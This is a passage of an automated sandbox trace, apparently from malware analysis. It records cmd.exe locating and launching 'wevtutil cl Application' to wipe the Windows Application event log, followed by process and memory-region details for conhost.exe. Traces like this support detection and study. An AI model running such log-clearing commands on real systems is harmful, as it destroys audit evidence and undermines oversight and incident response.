lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0093.711] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x3ee4a0, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0093.711] _wcsicmp (_String1="PROMPT", _String2="CD") returned 13 [0093.711] _wcsicmp (_String1="PROMPT", _String2="ERRORLEVEL") returned 11 [0093.711] _wcsicmp (_String1="PROMPT", _String2="CMDEXTVERSION") returned 13 [0093.711] _wcsicmp (_String1="PROMPT", _String2="CMDCMDLINE") returned 13 [0093.711] _wcsicmp (_String1="PROMPT", _String2="DATE") returned 12 [0093.711] _wcsicmp (_String1="PROMPT", _String2="TIME") returned -4 [0093.711] _wcsicmp (_String1="PROMPT", _String2="RANDOM") returned -2 [0093.711] _wcsicmp (_String1="PROMPT", _String2="HIGHESTNUMANODENUMBER") returned 8 [0093.711] SetEnvironmentVariableW (lpName="PROMPT", lpValue="$P$G") returned 1 [0093.712] GetEnvironmentStringsW () returned 0x46c7d68* [0093.712] FreeEnvironmentStringsA (penv="A") returned 1 [0093.712] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x3ee4a0, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0093.712] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x3ee4a0, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0093.712] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0093.712] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0093.712] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0093.712] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0093.712] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0093.712] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0093.712] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0093.712] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0093.712] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x459f6d0 | out: lpBuffer="C:\\Users\\CIiHmnxMn6Ps\\Desktop") returned 0x1d [0093.712] GetFullPathNameW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Desktop", nBufferLength=0x104, lpBuffer=0x459f6d0, lpFilePart=0x459f6c8 | out: lpBuffer="C:\\Users\\CIiHmnxMn6Ps\\Desktop", lpFilePart=0x459f6c8*="Desktop") returned 0x1d [0093.712] GetFileAttributesW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Desktop" (normalized: "c:\\users\\ciihmnxmn6ps\\desktop")) returned 0x11 [0093.712] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x459f450 | out: lpFindFileData=0x459f450) returned 0x46c05c8 [0093.713] FindClose (in: hFindFile=0x46c05c8 | out: hFindFile=0x46c05c8) returned 1 [0093.713] FindFirstFileW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps", lpFindFileData=0x459f450 | out: lpFindFileData=0x459f450) returned 0x46c05c8 [0093.713] FindClose (in: hFindFile=0x46c05c8 | out: hFindFile=0x46c05c8) returned 1 [0093.713] _wcsnicmp (_String1="CIIHMN~1", _String2="CIiHmnxMn6Ps", _MaxCount=0xc) returned 6 [0093.713] FindFirstFileW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Desktop", lpFindFileData=0x459f450 | out: lpFindFileData=0x459f450) returned 0x46c05c8 [0093.713] FindClose (in: hFindFile=0x46c05c8 | out: hFindFile=0x46c05c8) returned 1 [0093.713] GetFileAttributesW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Desktop" (normalized: "c:\\users\\ciihmnxmn6ps\\desktop")) returned 0x11 [0093.713] SetCurrentDirectoryW (lpPathName="C:\\Users\\CIiHmnxMn6Ps\\Desktop" (normalized: "c:\\users\\ciihmnxmn6ps\\desktop")) returned 1 [0093.713] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\CIiHmnxMn6Ps\\Desktop") returned 1 [0093.713] GetEnvironmentStringsW () returned 0x46c7d68* [0093.713] FreeEnvironmentStringsA (penv="=") returned 1 [0093.713] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x3f6720 | out: lpBuffer="C:\\Users\\CIiHmnxMn6Ps\\Desktop") returned 0x1d [0093.713] GetConsoleOutputCP () returned 0x1b5 [0093.714] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x3ee460 | out: lpCPInfo=0x3ee460) returned 1 [0093.714] GetUserDefaultLCID () returned 0x409 [0093.714] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x3f24a0, cchData=8 | out: lpLCData=":") returned 2 [0093.714] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x459f800, cchData=128 | out: lpLCData="0") returned 2 [0093.714] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x459f800, cchData=128 | out: lpLCData="0") returned 2 [0093.714] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x459f800, cchData=128 | out: lpLCData="1") returned 2 [0093.714] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x3f24b0, cchData=8 | out: lpLCData="/") returned 2 [0093.714] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x3f2500, cchData=32 | out: lpLCData="Mon") returned 4 [0093.714] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x3f2540, cchData=32 | out: lpLCData="Tue") returned 4 [0093.714] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x3f2580, cchData=32 | out: lpLCData="Wed") returned 4 [0093.714] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x3f25c0, cchData=32 | out: lpLCData="Thu") returned 4 [0093.714] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x3f2600, cchData=32 | out: lpLCData="Fri") returned 4 [0093.714] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x3f2640, cchData=32 | out: lpLCData="Sat") returned 4 [0093.714] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x3f2680, cchData=32 | out: lpLCData="Sun") returned 4 [0093.714] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x3f24c0, cchData=8 | out: lpLCData=".") returned 2 [0093.714] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x3f24e0, cchData=8 | out: lpLCData=",") returned 2 [0093.714] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0093.715] GetConsoleTitleW (in: lpConsoleTitle=0x46ca9e8, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0093.715] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x77670000 [0093.715] GetProcAddress (hModule=0x77670000, lpProcName="CopyFileExW") returned 0x7768fa80 [0093.715] GetProcAddress (hModule=0x77670000, lpProcName="IsDebuggerPresent") returned 0x7768a790 [0093.715] GetProcAddress (hModule=0x77670000, lpProcName="SetConsoleInputExeNameW") returned 0x76a835c0 [0093.716] _wcsicmp (_String1="wevtutil", _String2=")") returned 78 [0093.716] _wcsicmp (_String1="FOR", _String2="wevtutil") returned -17 [0093.716] _wcsicmp (_String1="FOR/?", _String2="wevtutil") returned -17 [0093.716] _wcsicmp (_String1="IF", _String2="wevtutil") returned -14 [0093.716] _wcsicmp (_String1="IF/?", _String2="wevtutil") returned -14 [0093.716] _wcsicmp (_String1="REM", _String2="wevtutil") returned -5 [0093.716] _wcsicmp (_String1="REM/?", _String2="wevtutil") returned -5 [0093.717] GetConsoleTitleW (in: lpConsoleTitle=0x459f4e8, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0093.717] _wcsicmp (_String1="wevtutil", _String2="DIR") returned 19 [0093.717] _wcsicmp (_String1="wevtutil", _String2="ERASE") returned 18 [0093.717] _wcsicmp (_String1="wevtutil", _String2="DEL") returned 19 [0093.717] _wcsicmp (_String1="wevtutil", _String2="TYPE") returned 3 [0093.717] _wcsicmp (_String1="wevtutil", _String2="COPY") returned 20 [0093.717] _wcsicmp (_String1="wevtutil", _String2="CD") returned 20 [0093.717] _wcsicmp (_String1="wevtutil", _String2="CHDIR") returned 20 [0093.717] _wcsicmp (_String1="wevtutil", _String2="RENAME") returned 5 [0093.717] _wcsicmp (_String1="wevtutil", _String2="REN") returned 5 [0093.717] _wcsicmp (_String1="wevtutil", _String2="ECHO") returned 18 [0093.717] _wcsicmp (_String1="wevtutil", _String2="SET") returned 4 [0093.717] _wcsicmp (_String1="wevtutil", _String2="PAUSE") returned 7 [0093.717] _wcsicmp (_String1="wevtutil", _String2="DATE") returned 19 [0093.717] _wcsicmp (_String1="wevtutil", _String2="TIME") returned 3 [0093.717] _wcsicmp (_String1="wevtutil", _String2="PROMPT") returned 7 [0093.717] _wcsicmp (_String1="wevtutil", _String2="MD") returned 10 [0093.717] _wcsicmp (_String1="wevtutil", _String2="MKDIR") returned 10 [0093.717] _wcsicmp (_String1="wevtutil", _String2="RD") returned 5 [0093.718] _wcsicmp (_String1="wevtutil", _String2="RMDIR") returned 5 [0093.718] _wcsicmp (_String1="wevtutil", _String2="PATH") returned 7 [0093.718] _wcsicmp (_String1="wevtutil", _String2="GOTO") returned 16 [0093.718] _wcsicmp (_String1="wevtutil", _String2="SHIFT") returned 4 [0093.718] _wcsicmp (_String1="wevtutil", _String2="CLS") returned 20 [0093.718] _wcsicmp (_String1="wevtutil", _String2="CALL") returned 20 [0093.718] _wcsicmp (_String1="wevtutil", _String2="VERIFY") returned 1 [0093.718] _wcsicmp (_String1="wevtutil", _String2="VER") returned 1 [0093.718] _wcsicmp (_String1="wevtutil", _String2="VOL") returned 1 [0093.718] _wcsicmp (_String1="wevtutil", _String2="EXIT") returned 18 [0093.718] _wcsicmp (_String1="wevtutil", _String2="SETLOCAL") returned 4 [0093.718] _wcsicmp (_String1="wevtutil", _String2="ENDLOCAL") returned 18 [0093.718] _wcsicmp (_String1="wevtutil", _String2="TITLE") returned 3 [0093.718] _wcsicmp (_String1="wevtutil", _String2="START") returned 4 [0093.718] _wcsicmp (_String1="wevtutil", _String2="DPATH") returned 19 [0093.718] _wcsicmp (_String1="wevtutil", _String2="KEYS") returned 12 [0093.718] _wcsicmp (_String1="wevtutil", _String2="MOVE") returned 10 [0093.718] _wcsicmp (_String1="wevtutil", _String2="PUSHD") returned 7 [0093.718] _wcsicmp (_String1="wevtutil", _String2="POPD") returned 7 [0093.718] _wcsicmp (_String1="wevtutil", _String2="ASSOC") returned 22 [0093.718] _wcsicmp (_String1="wevtutil", _String2="FTYPE") returned 17 [0093.718] _wcsicmp (_String1="wevtutil", _String2="BREAK") returned 21 [0093.718] _wcsicmp (_String1="wevtutil", _String2="COLOR") returned 20 [0093.718] _wcsicmp (_String1="wevtutil", _String2="MKLINK") returned 10 [0093.718] _wcsicmp (_String1="wevtutil", _String2="DIR") returned 19 [0093.718] _wcsicmp (_String1="wevtutil", _String2="ERASE") returned 18 [0093.718] _wcsicmp (_String1="wevtutil", _String2="DEL") returned 19 [0093.718] _wcsicmp (_String1="wevtutil", _String2="TYPE") returned 3 [0093.718] _wcsicmp (_String1="wevtutil", _String2="COPY") returned 20 [0093.718] _wcsicmp (_String1="wevtutil", _String2="CD") returned 20 [0093.718] _wcsicmp (_String1="wevtutil", _String2="CHDIR") returned 20 [0093.718] _wcsicmp (_String1="wevtutil", _String2="RENAME") returned 5 [0093.718] _wcsicmp (_String1="wevtutil", _String2="REN") returned 5 [0093.718] _wcsicmp (_String1="wevtutil", _String2="ECHO") returned 18 [0093.718] _wcsicmp (_String1="wevtutil", _String2="SET") returned 4 [0093.718] _wcsicmp (_String1="wevtutil", _String2="PAUSE") returned 7 [0093.718] _wcsicmp (_String1="wevtutil", _String2="DATE") returned 19 [0093.718] _wcsicmp (_String1="wevtutil", _String2="TIME") returned 3 [0093.718] _wcsicmp (_String1="wevtutil", _String2="PROMPT") returned 7 [0093.718] _wcsicmp (_String1="wevtutil", _String2="MD") returned 10 [0093.718] _wcsicmp (_String1="wevtutil", _String2="MKDIR") returned 10 [0093.718] _wcsicmp (_String1="wevtutil", _String2="RD") returned 5 [0093.718] _wcsicmp (_String1="wevtutil", _String2="RMDIR") returned 5 [0093.718] _wcsicmp (_String1="wevtutil", _String2="PATH") returned 7 [0093.718] _wcsicmp (_String1="wevtutil", _String2="GOTO") returned 16 [0093.718] _wcsicmp (_String1="wevtutil", _String2="SHIFT") returned 4 [0093.718] _wcsicmp (_String1="wevtutil", _String2="CLS") returned 20 [0093.718] _wcsicmp (_String1="wevtutil", _String2="CALL") returned 20 [0093.718] _wcsicmp (_String1="wevtutil", _String2="VERIFY") returned 1 [0093.718] _wcsicmp (_String1="wevtutil", _String2="VER") returned 1 [0093.718] _wcsicmp (_String1="wevtutil", _String2="VOL") returned 1 [0093.718] _wcsicmp (_String1="wevtutil", _String2="EXIT") returned 18 [0093.718] _wcsicmp (_String1="wevtutil", _String2="SETLOCAL") returned 4 [0093.718] _wcsicmp (_String1="wevtutil", _String2="ENDLOCAL") returned 18 [0093.718] _wcsicmp (_String1="wevtutil", _String2="TITLE") returned 3 [0093.719] _wcsicmp (_String1="wevtutil", _String2="START") returned 4 [0093.719] _wcsicmp (_String1="wevtutil", _String2="DPATH") returned 19 [0093.719] _wcsicmp (_String1="wevtutil", _String2="KEYS") returned 12 [0093.719] _wcsicmp (_String1="wevtutil", _String2="MOVE") returned 10 [0093.719] _wcsicmp (_String1="wevtutil", _String2="PUSHD") returned 7 [0093.719] _wcsicmp (_String1="wevtutil", _String2="POPD") returned 7 [0093.719] _wcsicmp (_String1="wevtutil", _String2="ASSOC") returned 22 [0093.719] _wcsicmp (_String1="wevtutil", _String2="FTYPE") returned 17 [0093.719] _wcsicmp (_String1="wevtutil", _String2="BREAK") returned 21 [0093.719] _wcsicmp (_String1="wevtutil", _String2="COLOR") returned 20 [0093.719] _wcsicmp (_String1="wevtutil", _String2="MKLINK") returned 10 [0093.719] _wcsicmp (_String1="wevtutil", _String2="FOR") returned 17 [0093.719] _wcsicmp (_String1="wevtutil", _String2="IF") returned 14 [0093.719] _wcsicmp (_String1="wevtutil", _String2="REM") returned 5 [0093.719] _wcsnicmp (_String1="wevt", _String2="cmd ", _MaxCount=0x4) returned 20 [0093.719] SetErrorMode (uMode=0x0) returned 0x0 [0093.719] SetErrorMode (uMode=0x1) returned 0x0 [0093.719] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0x46caf20, lpFilePart=0x459eff4 | out: lpBuffer="C:\\Users\\CIiHmnxMn6Ps\\Desktop", lpFilePart=0x459eff4*="Desktop") returned 0x1d [0093.719] SetErrorMode (uMode=0x0) returned 0x1 [0093.719] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x3ee4a0, nSize=0x2000 | out: lpBuffer="C:\\ProgramData\\Oracle\\Java\\javapath;C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x87 [0093.719] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0093.724] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x3ee4a0, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0093.725] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0093.725] FindFirstFileExW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\wevtutil.*", fInfoLevelId=0x1, lpFindFileData=0x459ed80, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x459ed80) returned 0xffffffff [0093.726] GetLastError () returned 0x2 [0093.726] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0093.726] FindFirstFileExW (in: lpFileName="C:\\ProgramData\\Oracle\\Java\\javapath\\wevtutil.*", fInfoLevelId=0x1, lpFindFileData=0x459ed80, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x459ed80) returned 0xffffffff [0093.727] GetLastError () returned 0x2 [0093.727] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0093.727] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\wevtutil.*", fInfoLevelId=0x1, lpFindFileData=0x459ed80, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x459ed80) returned 0x46cb2c0 [0093.728] FindClose (in: hFindFile=0x46cb2c0 | out: hFindFile=0x46cb2c0) returned 1 [0093.728] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\wevtutil.COM", fInfoLevelId=0x1, lpFindFileData=0x459ed80, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x459ed80) returned 0xffffffff [0093.728] GetLastError () returned 0x2 [0093.728] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\wevtutil.EXE", fInfoLevelId=0x1, lpFindFileData=0x459ed80, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x459ed80) returned 0x46cb2c0 [0093.728] FindClose (in: hFindFile=0x46cb2c0 | out: hFindFile=0x46cb2c0) returned 1 [0093.728] _wcsicmp (_String1=".EXE", _String2=".BAT") returned 3 [0093.728] _wcsicmp (_String1=".EXE", _String2=".CMD") returned 2 [0093.728] GetConsoleTitleW (in: lpConsoleTitle=0x459f274, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0093.729] InitializeProcThreadAttributeList (in: lpAttributeList=0x459f1a0, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x459f184 | out: lpAttributeList=0x459f1a0, lpSize=0x459f184) returned 1 [0093.729] UpdateProcThreadAttribute (in: lpAttributeList=0x459f1a0, dwFlags=0x0, Attribute=0x60001, lpValue=0x459f18c, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x459f1a0, lpPreviousValue=0x0) returned 1 [0093.729] GetStartupInfoW (in: lpStartupInfo=0x459f1d8 | out: lpStartupInfo=0x459f1d8*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\system32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0)) [0093.729] _wcsnicmp (_String1="COPYCMD", _String2="=C:=C:\\", _MaxCount=0x7) returned 38 [0093.729] _wcsnicmp (_String1="COPYCMD", _String2="ALLUSER", _MaxCount=0x7) returned 2 [0093.729] _wcsnicmp (_String1="COPYCMD", _String2="APPDATA", _MaxCount=0x7) returned 2 [0093.729] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0093.729] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0093.729] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0093.729] _wcsnicmp (_String1="COPYCMD", _String2="COMPUTE", _MaxCount=0x7) returned 3 [0093.729] _wcsnicmp (_String1="COPYCMD", _String2="ComSpec", _MaxCount=0x7) returned 3 [0093.729] _wcsnicmp (_String1="COPYCMD", _String2="HOMEDRI", _MaxCount=0x7) returned -5 [0093.729] _wcsnicmp (_String1="COPYCMD", _String2="HOMEPAT", _MaxCount=0x7) returned -5 [0093.729] _wcsnicmp (_String1="COPYCMD", _String2="LOCALAP", _MaxCount=0x7) returned -9 [0093.729] _wcsnicmp (_String1="COPYCMD", _String2="LOGONSE", _MaxCount=0x7) returned -9 [0093.729] _wcsnicmp (_String1="COPYCMD", _String2="NUMBER_", _MaxCount=0x7) returned -11 [0093.729] _wcsnicmp (_String1="COPYCMD", _String2="OneDriv", _MaxCount=0x7) returned -12 [0093.729] _wcsnicmp (_String1="COPYCMD", _String2="OS=Wind", _MaxCount=0x7) returned -12 [0093.729] _wcsnicmp (_String1="COPYCMD", _String2="Path=C:", _MaxCount=0x7) returned -13 [0093.729] _wcsnicmp (_String1="COPYCMD", _String2="PATHEXT", _MaxCount=0x7) returned -13 [0093.729] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0093.729] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0093.729] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0093.729] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0093.729] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0093.729] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0093.730] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0093.730] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0093.730] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0093.730] _wcsnicmp (_String1="COPYCMD", _String2="PROMPT=", _MaxCount=0x7) returned -13 [0093.730] _wcsnicmp (_String1="COPYCMD", _String2="PSModul", _MaxCount=0x7) returned -13 [0093.730] _wcsnicmp (_String1="COPYCMD", _String2="PUBLIC=", _MaxCount=0x7) returned -13 [0093.730] _wcsnicmp (_String1="COPYCMD", _String2="SystemD", _MaxCount=0x7) returned -16 [0093.730] _wcsnicmp (_String1="COPYCMD", _String2="SystemR", _MaxCount=0x7) returned -16 [0093.730] _wcsnicmp (_String1="COPYCMD", _String2="TEMP=C:", _MaxCount=0x7) returned -17 [0093.730] _wcsnicmp (_String1="COPYCMD", _String2="TMP=C:\\", _MaxCount=0x7) returned -17 [0093.730] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0093.730] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0093.730] _wcsnicmp (_String1="COPYCMD", _String2="USERNAM", _MaxCount=0x7) returned -18 [0093.730] _wcsnicmp (_String1="COPYCMD", _String2="USERPRO", _MaxCount=0x7) returned -18 [0093.730] _wcsnicmp (_String1="COPYCMD", _String2="windir=", _MaxCount=0x7) returned -20 [0093.730] lstrcmpW (lpString1="\\wevtutil.exe", lpString2="\\XCOPY.EXE") returned -1 [0093.731] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\wevtutil.exe", lpCommandLine="wevtutil cl Application", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\CIiHmnxMn6Ps\\Desktop", lpStartupInfo=0x459f128*(cb=0x48, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="wevtutil cl Application", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x459f174 | out: lpCommandLine="wevtutil cl Application", lpProcessInformation=0x459f174*(hProcess=0xa8, hThread=0xa4, dwProcessId=0x670, dwThreadId=0x300)) returned 1 [0093.925] CloseHandle (hObject=0xa4) returned 1 [0093.925] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0093.925] GetEnvironmentStringsW () returned 0x46c9ed0* [0093.925] FreeEnvironmentStringsA (penv="=") returned 1 [0093.925] WaitForSingleObject (hHandle=0xa8, dwMilliseconds=0xffffffff) returned 0x0 [0094.072] GetExitCodeProcess (in: hProcess=0xa8, lpExitCode=0x459f10c | out: lpExitCode=0x459f10c*=0x0) returned 1 [0094.072] CloseHandle (hObject=0xa8) returned 1 [0094.072] _vsnwprintf (in: _Buffer=0x459f1f4, _BufferCount=0x13, _Format="%08X", _ArgList=0x459f114 | out: _Buffer="00000000") returned 8 [0094.072] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000000") returned 1 [0094.072] GetEnvironmentStringsW () returned 0x46cb3a8* [0094.072] FreeEnvironmentStringsA (penv="=") returned 1 [0094.072] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0094.072] GetEnvironmentStringsW () returned 0x46cb3a8* [0094.072] FreeEnvironmentStringsA (penv="=") returned 1 [0094.073] DeleteProcThreadAttributeList (in: lpAttributeList=0x459f1a0 | out: lpAttributeList=0x459f1a0) [0094.073] _get_osfhandle (_FileHandle=1) returned 0x3c [0094.073] SetConsoleMode (hConsoleHandle=0x3c, dwMode=0x3) returned 1 [0094.073] _get_osfhandle (_FileHandle=1) returned 0x3c [0094.073] GetConsoleMode (in: hConsoleHandle=0x3c, lpMode=0x3ee40c | out: lpMode=0x3ee40c) returned 1 [0094.073] _get_osfhandle (_FileHandle=0) returned 0x38 [0094.073] GetConsoleMode (in: hConsoleHandle=0x38, lpMode=0x3ee408 | out: lpMode=0x3ee408) returned 1 [0094.073] SetConsoleInputExeNameW () returned 0x1 [0094.073] GetConsoleOutputCP () returned 0x1b5 [0094.073] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x3ee460 | out: lpCPInfo=0x3ee460) returned 1 [0094.073] SetThreadUILanguage (LangId=0x0) returned 0x409 [0094.073] exit (_Code=0) Thread: id = 9 os_tid = 0xb30 Process: id = "3" image_name = "conhost.exe" filename = "c:\\windows\\system32\\conhost.exe" page_root = "0x1c6dd000" os_pid = "0x838" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "2" os_parent_pid = "0x774" cmd_line = "\\??\\C:\\Windows\\system32\\conhost.exe 0xffffffff -ForceV1" cur_dir = "C:\\Windows" os_username = "LHNIWSJ\\CIiHmnxMn6Ps" os_groups = "LHNIWSJ\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0001714b" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 255 start_va = 0x7fa19000 end_va = 0x7fa19fff entry_point = 0x0 region_type = private name = "private_0x000000007fa19000" filename = "" Region: id = 256 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 257 start_va = 0xf19260000 end_va = 0xf1927ffff entry_point = 0x0 region_type = private name = "private_0x0000000f19260000" filename = "" Region: id = 258 start_va = 0xf19280000 end_va = 0xf19293fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000f19280000" filename = "" Region: id = 259 start_va = 0xf192a0000 end_va = 0xf192dffff entry_point = 0x0 region_type = private name = "private_0x0000000f192a0000" filename = "" Region: id = 260 start_va = 0x7df5ff730000 end_va = 0x7ff5ff72ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007df5ff730000" filename = "" Region: id = 261 start_va = 0x7ff6c3d80000 end_va = 0x7ff6c3da2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007ff6c3d80000" filename = "" Region: id = 262 start_va = 0x7ff6c3da5000 end_va = 0x7ff6c3da5fff entry_point = 0x0 region_type = private name = "private_0x00007ff6c3da5000" filename = "" Region: id = 263 start_va = 0x7ff6c3dae000 end_va = 0x7ff6c3daffff entry_point = 0x0 region_type = private name = "private_0x00007ff6c3dae000" filename = "" Region: id = 264 start_va = 0x7ff6c4950000 end_va = 0x7ff6c4960fff entry_point = 0x7ff6c4950000 region_type = mapped_file name = "conhost.exe" filename = "\\Windows\\System32\\conhost.exe" (normalized: "c:\\windows\\system32\\conhost.exe") Region: id = 265 start_va = 0x7ffc03e70000 end_va = 0x7ffc04031fff entry_point = 0x7ffc03e70000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 266 start_va = 0xf19470000 end_va = 0xf1956ffff entry_point = 0x0 region_type = private name = "private_0x0000000f19470000" filename = "" Region: id = 267 start_va = 0x7ffc01360000 end_va = 0x7ffc0153cfff entry_point = 0x7ffc01360000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 268 start_va = 0x7ffc03dc0000 end_va = 0x7ffc03e6cfff entry_point = 0x7ffc03dc0000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 269 start_va = 0xf19260000 end_va = 0xf1926ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000f19260000" filename = 